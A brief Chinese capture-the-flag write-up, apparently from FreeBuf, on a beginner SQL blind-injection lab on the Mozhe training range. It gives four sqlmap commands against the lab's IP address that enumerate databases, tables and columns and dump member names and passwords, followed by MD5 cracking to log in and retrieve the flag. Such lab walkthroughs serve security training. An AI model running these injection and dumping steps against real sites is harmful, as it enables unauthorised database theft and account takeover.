墨者靶场SQL盲注(入门)
1.打开靶场,看到此处(主要是针对SQL注入,所有直接找注入点,登录先不看)
2.看到了平台停机维护,看到URL的参数id,下意识以为找到位置了
3.放到神器sqlmap跑一下看看,发现目标!
4.继续爆破数据库、表、用户名密码
sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 --dbs
sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup --tables
sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup -T member --columns
sqlmap.py -u http://219.153.49.228:42711/new_list.php?id=1 -D stormgroup -T member -C name,password --dump
5.获取密码后,发现是md5加密,进行解密后发现第二账号可以登录,登录后即可看到KEY
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐